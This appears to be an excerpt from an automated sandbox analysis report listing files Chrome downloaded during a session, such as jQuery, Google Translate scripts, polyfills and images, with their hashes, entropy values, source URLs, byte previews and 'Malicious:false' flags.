                                                                                                                                                                                                                                                            Preview:GIF89a..............0.........u...(rp.Ox.9..........).bW....2$......B4e....bRPd........xyz...DDTeeh99K.....\............q..........ee.@..p...VVX...4.X......668GGG......4y............T......$$'..:}.........wx....D........(q...t...]j...D..-t..?v.....UShJJ\....^.hiq...Z...........#.KYXn...M....R...............()1N..B.......'\[qLK_..v..=i.;q.........V.v...........>y.wGQ.......e9A...Km....N.4...[[_......>...LMPpkM..=v...A....7A....#n....:...FEX...............-../v..WVk+].......caw............PQT``e...Sg....-&.3~.............G.............4:''...O^.Dq................&....3.. F..S..210NNb...4."?..4e.UIT,.R.O.pn.oo}.h..../HHY..............E...AAB...OQf0/;..#lk.nn...................6R.;<=4b...@../CWs......nnn|]qutp..>HHQ......s.....@........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (32065)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):85578
                                                                                                                                                                                                                                                            Entropy (8bit):5.366055229017455
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                                                                                                                                                                                                                                                            MD5:2F6B11A7E914718E0290410E85366FE9
                                                                                                                                                                                                                                                            SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                                                                                                                                                                                                                            SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                                                                                                                                                                                                                            SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                                                                                                                                                                                                                                            Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (550)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):5988
                                                                                                                                                                                                                                                            Entropy (8bit):5.620836148974611
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:UZcrnjcq1wuDEkR2WBghmf8jckwK2FPMYXP:VD5xWfhmNPPMY/
                                                                                                                                                                                                                                                            MD5:206495BAECBF35648368B34E7B75B60B
                                                                                                                                                                                                                                                            SHA1:AA25158A96EB7D49A612FBCF90781FCFFDED754D
                                                                                                                                                                                                                                                            SHA-256:14F6CB216446A2DE84E09CB13922DF66E9BB23AD55F88AAB6E399F85601E6E73
                                                                                                                                                                                                                                                            SHA-512:38CB5EEDC9BE96B3A7FFA26EA282D482E5CE873FFAFCCC9F22352999909583615F4833EB77A81FE0019B44EC7A6895D7AC323DA3BA24F14661CCFD322D9420D1
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverUi.en.t7_VRwG1YCg.es5.O/ck=boq-translate.TranslateWebserverUi.3Kpn12MAoRc.L.B1.O/am=gemZDQsCAQg/d=1/exm=A7fCU,AJZZxc,AKLKy,AV6dJd,BVgquf,CHCSlb,COQbmf,CTfTTd,CW8lw,DFTXbf,E2VjNc,EEDORb,EF8pe,EFQ78c,FZTbYc,G0j0Je,GILUZe,GSlykd,GiFjve,Gkrb3e,HgVFRb,HruX3d,HwavCb,I6YDgd,IZT63,Id96Vc,IjTJJb,Izs65d,JE2clc,JH2zc,JNcm2e,JNoxi,JPvYpc,JVNQkc,JWUKXe,K4PcAe,KG2eXe,KOuY1b,KUM7Z,L1AAkb,LEikZe,LFynkb,LP4cEc,M2suMc,MDB2J,MI6k7c,MJWMce,MY2OBe,MaBk4,Mlhmy,MnwvSb,MpJwZc,N2mfec,NotTJb,NufREb,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6Sgne,PJgxJf,PrPYRd,QIhFr,QKK0O,Qnj3Pe,QqJ8Gd,R6UQsc,RAnnUd,RMhBfe,RqjULd,Ru0Pgb,SNtCZb,SdcwHb,SpsfSb,T8kZcd,TJQ3Ud,Tpj7Pb,TzmfU,U0aPgd,UECOXe,UUJqVe,UWMmZb,Uas9Hd,UfGXTd,Ulmmrd,Un38xf,UthHZe,V3dDOb,V8JnLd,VETAO,VNcg1e,VwDzFe,WCciof,WO9ee,WYNSOe,XBRlNc,XMsnSd,XVMNvd,Xn16n,YrN4Fb,ZH8ved,ZbunN,ZfAoz,ZwDk9d,_b,_r,_tp,a4GDlb,aW3pY,aurFic,bD99Db,bTi8wc,bYHiff,bm51tf,byfTOb,cPVRG,ceo3ne,dmy0Zb,duFQFc,eM1C7d,eYJrS,ehH0Pd,fKBXPe,fKUV3e,fR6Vdb,ff8rzd,fmklff,g8fAWe,gJzDyc,gWGePc,glibvb,gychg,hB8iWe,hKSk3e,hPAkKe,hc6Ubd,hmxKAd,i5dxUd,j4UNFc,jMem0b,jl0Zdc,kWgXee,kjKdXe,lWpni,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mNvcvf,mdR7q,mmcjze,mzzZzc,n391td,n73qwf,nKuFpb,onWwzb,ovKuLd,p8L0ob,pKzUve,pjICDe,pvoWvc,pw70Gc,q0xTif,qRXAtf,rCcCxc,rPRh8e,rSlV0d,s2VbJb,s2XCRc,s39S4,sGhhBd,sJhETb,sOXFj,soHxf,t1sulf,tQX3bd,tQbu0,tjiVBd,u8fSBf,uu7UOe,w9hDv,ws9Tlc,xQtZb,xUdipf,xdp6Ne,xzbRj,yDVVkb,yi1Dad,zbML3c,zr1jrb/excm=_b,_r,_tp,mainview/ed=1/wt=2/rs=ANkVxDlgUx_pEh_72ZiUbycS92nBrlu9eA/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;EVNhjf:pw70Gc;eBAeSb:zbML3c;yEQyxe:p8L0ob;JsbNhc:Xd8iUd;NSEoX:lazG7b;zxnPse:duFQFc;pXdRYb:XBRlNc;oGtAuc:sOXFj;wQlYve:aLUfP;g8nkx:U4MzKc;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;nAFL3:s39S4;iFQyKf:QIhFr;kbAm9d:MkHyGd;xqZiqf:BBI74;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=BSwBZd"
                                                                                                                                                                                                                                                            Preview:"use strict";this.default_TranslateWebserverUi=this.default_TranslateWebserverUi||{};(function(_){var window=this;.try{._.k("BSwBZd");.var X$a=function(){return"Choose a document"},Y$a=function(){return"Upload a .docx, .pdf, .pptx, or .xlsx."},Z$a=function(){return"Learn more"},YW={},$$a,aab,bab=function(){_.pJ.call(this)};_.C(bab,_.pJ);.var cab,dab,eab,fab,gab,hab,iab,jab,kab,lab,mab,nab=function(a,b,c,d){b.open("div","JAXGVe");b.U(gab||(gab=["class","sUGHdf","jsname","NSj5z"]));b.v();b.open("div","J55iib");b.U(hab||(hab=["class","cDGEmc"]));b.v();var e=b.N("zdIwKd");_.CJ(b,"drive_file",void 0,void 0,"QLCFQ");b.H(e);b.close();b.open("div","SeWHed");b.U(iab||(iab=["class","ntLOd"]));b.v();b.open("div","tjgAnc");b.U(jab||(jab=["class","MXuJQd","jsname","uzxqBb"]));b.v();_.X(b,c);b.close();b.open("div","gmI46");b.U(kab||(kab=["class",."d3Mtee","jsname","RPF41d"]));b.v();_.X(b,d);b.close();b.close();b.open("div","ZMqyD");b.U(lab||(lab=["class","Pjatl"]));b.v();b.open("div","NiXAvb");b.U(m
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 2096x1182, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):156090
                                                                                                                                                                                                                                                            Entropy (8bit):7.714100651227665
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:qwKuuF+/z5Y/2LM4gWSWt4D2xVM0FCfHuYVZw/gAP1l5m:qhodY/WSWODAVgWk0tnm
                                                                                                                                                                                                                                                            MD5:846258590677C245BD9107CFEBC81F4F
                                                                                                                                                                                                                                                            SHA1:D01EFA679158E9B160CE8CBFA3DFAD4B1A42BD59
                                                                                                                                                                                                                                                            SHA-256:02319658A6AB456351F9191BA0A06ADF78D77510CA933AD8287A2C9633D81145
                                                                                                                                                                                                                                                            SHA-512:8A2119806083E13D0DEDF0A84EDF8A5590D489883CC5F53DEBF281B7C7AA1A831574CAD8EC2D3D26CBDF4C6203BA4825816589DED8198DA48BFCCF3E73A1006D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://storage.googleapis.com/gweb-uniblog-publish-prod/original_images/Test_SleepAI-hero-1.jpg
                                                                                                                                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d....................)......a...............................................................................................................................................0.......................................................................................... 0@1.3P`p!4..2.5..A"#D$..%.&6......................!1..AQq..2r.. 0@P`a."34..BR..#.p.b...s..C$...S.T..................!0..p...........................!1 0@AQaqP..`.......p.................0..........................6.......Y`........lo=.._...................m...............................VZK.Y..............................%.6........Ime..\..........u.RP..#...u.R.................{-`..............................%.rk ...............................,...........5...7..}>.@......,.....b..8...................<.l...............................<.fK..............................\Y.u..:.d.............<..S].O.........a.d.@...n]g.u.Y.................%.@...........................
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1280x720, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):112878
                                                                                                                                                                                                                                                            Entropy (8bit):7.998421039109912
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:3072:MBBZgMZFT3DmrB+TRca8BvGNI8e4h0aZUmDETMTN+h91:MBBxF+1+dcacsHh0aZUHCIT1
                                                                                                                                                                                                                                                            MD5:2C552A69258A146C1C4197F438B39748
                                                                                                                                                                                                                                                            SHA1:8F6CEA713916639064228090459EE59729E16EA7
                                                                                                                                                                                                                                                            SHA-256:01A77669AFCD35FCCD433EE1272A36C4DA7721B9E14805B7BC5D5E0606E078EE
                                                                                                                                                                                                                                                            SHA-512:E542D8698D0D64FCCB81CA938E693B7BA40306269C092F538796E91EE7831A5B6B31A92BC09A238E0E6526AE1F1022AAC9868790AA63D550EB247498F0F52E09
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://i.ytimg.com/vi_webp/4WXs3sKu41I/maxresdefault.webp
                                                                                                                                                                                                                                                            Preview:RIFF...WEBPVP8 ...0g...*....>m2.G$#$.(......ce..........B..9....G.>x...*....G.~..O.:...}cG....3.#..h....OE............S..;.{g.o`/.P.k:v...../......:?r......}'..3...v.....NX.....k...o..R?.....~....g|*...7.S..]w./....i.....f......._....{.S././.?.~g..C.O.\....~n.]......@...7.O.~..E.6..........N..x_...~..g.................z....?...z........7.g......./..c..*... ...AD...z..{de.5J...K.w..We..._.]....a..9...)..2.Y.A...h!....-....q....3z..j.. E.vA...N....U9T.}xK.#.?.w.P..bQ-..p[^>x.*z....@.Vr....z.......=6....5......)...........fqw...mt...8..}....V8.:..zz...Ak.....H.G...)..Jq.4,......O.3.._*..mm...n!.^Ej.....B..Vg..+.FXv....,.y>O...{..v...i.,.+..Xv..0.9.....\.).5..Z.q...T....\.N...by......[....m.....,Y?.s]W..>...........n0i..f.(..........._.G..8.L....0...<.......8.H......|...nbL'03N.)~a.m.HBJnr....t%y..Q...me....ou.wK.)8..z..Z=G.r....JL..Y..=.L..<.%...@..e...r.....b9..9>.c..\auC?..tDW....|7K...xXncK1.wK.g....-u.....A....:I...\<}QUN.......?....
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x288, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):25172
                                                                                                                                                                                                                                                            Entropy (8bit):7.953763413211907
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:02wPaGnXfEonJsKtHzhBPeeASUVOe8vQ5Xpe8FAvYo8MnnqIXpgox8nfFO7:0nPas3FFhBPjtUIe83mAvdnqmp/8nNO7
                                                                                                                                                                                                                                                            MD5:396BAFBEECB5F8985825A2DAAF5440A8
                                                                                                                                                                                                                                                            SHA1:7CA6C13C87591290043921971EF7C083AD5B09ED
                                                                                                                                                                                                                                                            SHA-256:C84F7DA26ED3A479B9750F1778C995BC052C01A03FCCD14DEEF62C8E1EC3DA94
                                                                                                                                                                                                                                                            SHA-512:6F34BBE7F7747C079827BD7B990670B46AC0FA267FD179A624F01D31B0AB6880FC75F0A789AD7FFC027A14DD4765E5708E6EF21BACACB11E6CF1FC129F720FB0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF...................................................................................................................................................... ..............................................F..........................!..1A"Qaq...#2R...Bb...$3rs...D....C.Sct...................................4........................!1..A."Q.aq....2...B.R..#b............?...*./.PG.6H...H.....X....l.SDZ..V......)H.JL...@..(&.....0......L...... ...(...&....[.AM>...N..Bc. ..Q[.!...........$......S..a4!.BKPDQH..(.^.91XI..u.../S....G`(..t$.Y"b.*...HA6..tV$.`..D-*@......L.b..._D.5.6...0....P...RhV..A.*ea....B.&....@......R..0..........@.....1...V..3.8..![.R7...n.E3uR9.|.ESu..[N&... .Y.d.&1.-{...!.?/..t.Yf.....3...v!L.|.Y.36&.WL..C]..s.....d.......d.V.=v_...Q.......]..<&j.#...j.G3.$..x..(H...F=.......}V..n.?s..4^.\..r=.......x..L.)1 ..LQQ.....r.!...$..).rKxo..^I"....5..Yfd.B.j.2H..pk.......9..v..w.}.j.y..+cvq.5x|.......r7o.2..VX.......v.4..Z.o.......j.7-.g.B... T$5+'A..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 64 x 64
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):22232
                                                                                                                                                                                                                                                            Entropy (8bit):7.686182077506593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:p34PntB8eGJuI7tq8ETwIYD+ucPFRxLvBXxGiYDFhDMf4xZg+oB8qe35:p34PntB/GJuqdEMI2+DRZvBXx0DFhDDb
                                                                                                                                                                                                                                                            MD5:099D8B46FBB6BA808F6F4B027BAB82C8
                                                                                                                                                                                                                                                            SHA1:82669B356EDB3FC444C7EBC3175BEB232F45BEC0
                                                                                                                                                                                                                                                            SHA-256:DACD0E50D9482B01B3193748836D9C21909455A72520189D1B5DB2824B8B2426
                                                                                                                                                                                                                                                            SHA-512:5D7E845977C8E71C633FDBED22FF5F77FA5670B6AFF6585ABC1D287730D2C540C921FC44E0669E6B10E72BBDC99C7A331666ED2B68B9C44AFC5B331389D6EF3F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/images/hpp/gsa_super_g-64.gif
                                                                                                                                                                                                                                                            Preview:GIF89a@.@....8.G.....d+r.E.........0)...../...S.\g.k$.8N.....................0.......o......5...........;x..um....{.PL0v.H...pid..Z.&E..{........(#;..-.A.......6/3.G...RJ..{1.........(# h...........0(..I9.6..........:.Nw.{.b[.........5.@.$".....&.P&.<q./.......EB.v.0..)........(...b];...m............"Fy..,,.:6..P.....3n...x.7....<..B...A.Q$.6...).N....ZY._..E?..S..:.........!...<...,....@.@.....}........................................................~.................................}....}....~.}.. .U.....9..}......C...$....#.M..*J..a. 7.t.!...>....B.c.>..8p....B... @.@...>>I.....::...@.,......#...I(H...5i..gq...X. .. ...E........G..... .!.X.n.....b..AS.[..i....m...O.HV....Yo...7.."...F...o%K.....w.i....d.._...r6...l=..B..T.S..)`F......I.... P.T.&}Cb....T@^.K...|.PN...:.$@.=|..V...4. .H4PCB...@9` B{...B...h.:.>C.:..7.B.]. ."a. .H".&..M.*R.b....32..@6...<...@.).DV...!.......,....=.................~...}...r...........f..f...#n..,....5....U./.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (789)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):11909
                                                                                                                                                                                                                                                            Entropy (8bit):5.42561032485909
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:nYBnyqfzxO+peIUM0i0lYbacvB9hiOh5Jyk+3TAxUe1OZjR:nYBnyqfVO+peIUVi0+acvzUOskSCOlR
                                                                                                                                                                                                                                                            MD5:0A91B4613FB12249161702D9D600F676
                                                                                                                                                                                                                                                            SHA1:8B7CF262200BBA08F7E784BEBEF2ADCB6DC0CB38
                                                                                                                                                                                                                                                            SHA-256:2EB5128C4C7BBB2C624276F62BAA501653A0D2BFEF00F28012DB49736545FEA4
                                                                                                                                                                                                                                                            SHA-512:3650A944EAE4C8363B1B68377985542D012A14F0584B9E2BE41246554F449022AAA9CBA48C6A0EA4EBF5779A59726BC446787C14A84C41DDE59FC98E42660858
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://about.google/assets-main/js/polyfills.min.js?cache=8b7cf26
                                                                                                                                                                                                                                                            Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var a=a||{};a.global=this||self;a.exportPath_=function(b,c,d,e){b=b.split(".");e=e||a.global;b[0]in e||"undefined"==typeof e.execScript||e.execScript("var "+b[0]);for(var f;b.length&&(f=b.shift());)if(b.length||void 0===c)e=e[f]&&e[f]!==Object.prototype[f]?e[f]:e[f]={};else if(!d&&a.isObject(c)&&a.isObject(e[f]))for(var g in c)c.hasOwnProperty(g)&&(e[f][g]=c[g]);else e[f]=c};a.define=function(b,c){return c};a.FEATURESET_YEAR=2012;a.DEBUG=!0;a.LOCALE="en";a.TRUSTED_SITE=!0;.a.DISALLOW_TEST_ONLY_CODE=!a.DEBUG;a.ENABLE_CHROME_APP_SAFE_SCRIPT_LOADING=!1;a.provide=function(b){if(a.isInModuleLoader_())throw Error("goog.provide cannot be used within a module.");a.constructNamespace_(b)};a.constructNamespace_=function(b,c,d){a.exportPath_(b,c,d)};a.getScriptNonce=function(b){if(b&&b!=a.global)return a.getScriptNonce_(b.document);null===a.cspNonce_&&(a.cspNonce_=a.getScriptNonce_(a.global.document));
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, baseline, precision 8, 1200x400, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):187785
                                                                                                                                                                                                                                                            Entropy (8bit):7.966271185249122
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:hpIQKlq/LPPFjlJHTrqmVEJBO5ocwkgQdgNvfrURYNVhZvMerkNtUDtTeo6OBtcQ:hmQKl0TFvHnq5JBO5ocqIgNvAqRke4NY
                                                                                                                                                                                                                                                            MD5:8A4AD3A2783D7E70CECC7DF6CFA57892
                                                                                                                                                                                                                                                            SHA1:D904840A17F3769D48AE0FA1627CE729531F3D05
                                                                                                                                                                                                                                                            SHA-256:78702427F71079C7C258C6A1D88D97A55FD49A71CB43DC76C1892CABD01F7F59
                                                                                                                                                                                                                                                            SHA-512:07880262E19474117B960EBE8E7F6866E14FE3230F0A47F9E765BF7500902F4BF57F3DF9DCBF40EF0C292362025230B8B0581AC715928D2DDED73AF408121ED7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:....................................................................................................................................................................................................................................................!.."..1.A2#.Q.aB$qR3%..x9bCS4&..8.....D.6V'w(X..c.W...Y.s.5uv..7.)........................!..1.A..Qa".q..2B#...R3...b$...r.CS..c...s4Tt.%......D5U&6V..Ee7u'.............?.....D.&.0..L"a...E...}N._m...R+S..,..".t.j-.....=E6q.P..\"..g..............8.g.r(:V9.M_8.......Um..xD."d.o .~S]".8.*..L"a....H..."..F........."......).@..x....<.7..lk.lms.[R.......H.Z.z....Uj.c.....c..I.. ..{..>(.S.K.c..i3.v......pc{...)x....7]...d......kh..J6D.......s........[\......B.<.K.D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.0..L"a...D.&.pT.A..d..C.....:e .....>F.y........s.%.1].9..1......jkR]..L..Kcr.KD....R...@j...^T.&.0..L"a...
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (27811)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):505379
                                                                                                                                                                                                                                                            Entropy (8bit):5.599351375154889
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:MuhjV4NSa8nB+cHouFUzmuLBZp+cLE0iv:LV4NECmWBf+C9iv
                                                                                                                                                                                                                                                            MD5:BDDE85191B4FBB0D0ED37ACA979B4D7B
                                                                                                                                                                                                                                                            SHA1:CBBD70839C03F430121B569F8FB5205162A34EB0
                                                                                                                                                                                                                                                            SHA-256:32316A69AD13E2F25F29589E75BD52C70ED9F28B1C0F4727E0F237524F62E8C9
                                                                                                                                                                                                                                                            SHA-512:3118C83A1DA829348E0C1AB89352E2DDF5DF17EC0D344BC581A4BDC277E28753124E78EC6A588B8ACCB27CC63566AC6096AEDF7073755205B18682B6B91E04A0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverUi.en.t7_VRwG1YCg.es5.O/ck=boq-translate.TranslateWebserverUi.3Kpn12MAoRc.L.B1.O/am=gemZDQsCAQg/d=1/exm=RAnnUd,_b,_r,_tp,i5dxUd,m9oV,soHxf,uu7UOe/excm=_b,_r,_tp,mainview/ed=1/wt=2/rs=ANkVxDlgUx_pEh_72ZiUbycS92nBrlu9eA/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;EVNhjf:pw70Gc;eBAeSb:zbML3c;yEQyxe:p8L0ob;JsbNhc:Xd8iUd;NSEoX:lazG7b;zxnPse:duFQFc;pXdRYb:XBRlNc;oGtAuc:sOXFj;wQlYve:aLUfP;g8nkx:U4MzKc;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;nAFL3:s39S4;iFQyKf:QIhFr;kbAm9d:MkHyGd;xqZiqf:BBI74;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=n73qwf,UUJqVe,ws9Tlc,IZT63,TzmfU,CHCSlb,O1Gjze,byfTOb,lsjVmc,xUdipf,OTA3Ae,COQbmf,fKUV3e,aurFic,U0aPgd,ZwDk9d,V3dDOb,WO9ee,mI3LFb,K4PcAe,j4UNFc,p8L0ob,pKzUve,GSlykd,tjiVBd,gWGePc,Izs65d,O6y8ed,mzzZzc,MpJwZc,PrPYRd,LEikZe,NwH0H,OmgaI,lazG7b,fmklff,s39S4,XVMNvd,KUM7Z,Mlhmy,L1AAkb,hB8iWe,duFQFc,lwddkf,E2VjNc,gychg,w9hDv,EEDORb,RMhBfe,Ru0Pgb,pw70Gc,SdcwHb,aW3pY,QqJ8Gd,UWMmZb,EFQ78c,Ulmmrd,ZfAoz,mdR7q,ehH0Pd,MnwvSb,xQtZb,I6YDgd,n391td,N2mfec,glibvb,bD99Db,yi1Dad,hPAkKe,XBRlNc,JNoxi,kWgXee,MI6k7c,kjKdXe,g8fAWe,QIhFr,BVgquf,YrN4Fb,ovKuLd,hKSk3e,bYHiff,yDVVkb,hc6Ubd,SpsfSb,PJgxJf,G0j0Je,MDB2J,KG2eXe,jl0Zdc,s2VbJb,zbML3c,VwDzFe,lWpni,KOuY1b,rPRh8e,GiFjve,AV6dJd,AJZZxc,V8JnLd,zr1jrb,JE2clc,UthHZe,Id96Vc,NotTJb,pvoWvc,mmcjze,SNtCZb,A7fCU,VETAO,FZTbYc,Uas9Hd,Qnj3Pe,AKLKy,mNvcvf,pjICDe"
                                                                                                                                                                                                                                                            Preview:"use strict";_F_installCss(".EDId0c{position:relative}.nhh4Ic{position:absolute;left:0;right:0;top:0;z-index:1;pointer-events:none}.nhh4Ic[data-state=snapping],.nhh4Ic[data-state=cancelled]{transition:transform 200ms}.MGUFnf{display:block;width:28px;height:28px;padding:15px;margin:0 auto;transform:scale(0.7);background-color:#fafafa;border:1px solid #e0e0e0;border-radius:50%;box-shadow:0 2px 2px 0 rgba(0,0,0,.2);transition:opacity 400ms}.nhh4Ic[data-state=resting] .MGUFnf,.nhh4Ic[data-state=cooldown] .MGUFnf{transform:scale(0);transition:transform 150ms}.nhh4Ic .LLCa0e{stroke-width:3.6px;transform:translateZ(1px)}.nhh4Ic[data-past-threshold=false] .LLCa0e{opacity:.3}.rOhAxb{fill:#4285f4;stroke:#4285f4}.A6UUqe{display:none;stroke-width:3px;width:28px;height:28px}.tbcVO{width:28px;height:28px}.bQ7oke{position:absolute;width:0;height:0;overflow:hidden}.A6UUqe.qs41qe{animation-name:quantumWizSpinnerRotate;animation-duration:1568.63ms;animation-iteration-count:infinite;animation-timing-func
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (6637), with no line terminators
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):6637
                                                                                                                                                                                                                                                            Entropy (8bit):5.049044491281893
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:864aoCtrJc6/X3PDNLWJ1xv/m+DPQ+I4FKoh3tGGIpZV6/zsSwdDJFBsVj8QM0G:x4Vx6/vJLave+zakla8odFBsVjfG
                                                                                                                                                                                                                                                            MD5:58AA35495AD72FBB919779F78EC44FD2
                                                                                                                                                                                                                                                            SHA1:641ADECBF64C0F63C82300A6F9C59C816B2FC93D
                                                                                                                                                                                                                                                            SHA-256:EEFDBDB8B26F23E7907BDC5BAF92A7ECAFEA5DBF85ACD8D50AD3CB77E4113291
